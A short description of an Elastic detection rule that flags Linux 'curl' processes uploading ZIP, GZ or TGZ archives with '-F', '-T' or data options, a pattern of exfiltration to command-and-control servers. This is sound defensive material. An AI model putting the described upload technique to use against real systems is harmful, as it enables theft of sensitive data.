This detection rule, authored by Elastic, aims to identify potential data exfiltration activities on Linux systems using the 'curl' command. Threat actors often utilize 'curl' to upload archived files containing sensitive data to their command and control (C2) servers. This rule focuses on detecting this abnormal behavior by monitoring process activities initiated by 'curl', particularly when certain arguments that are commonly associated with file uploads (such as '-F', '-T', or data options) are used. It examines the 'command_line' of the process for patterns that indicate an attempt to send files over HTTP or HTTPS, targeting archive formats like ZIP, GZ, and TGZ. The rule operates on data emitted by Elastic Defend and requires the correct integration setup to capture all necessary events, especially the environment variables related to proxies which might be involved during the upload operations. The identified behavior is scored with a medium risk score of 47, highlighting its significance in threat detection frameworks based on MITRE ATT&CK tactics and techniques related to data exfiltration.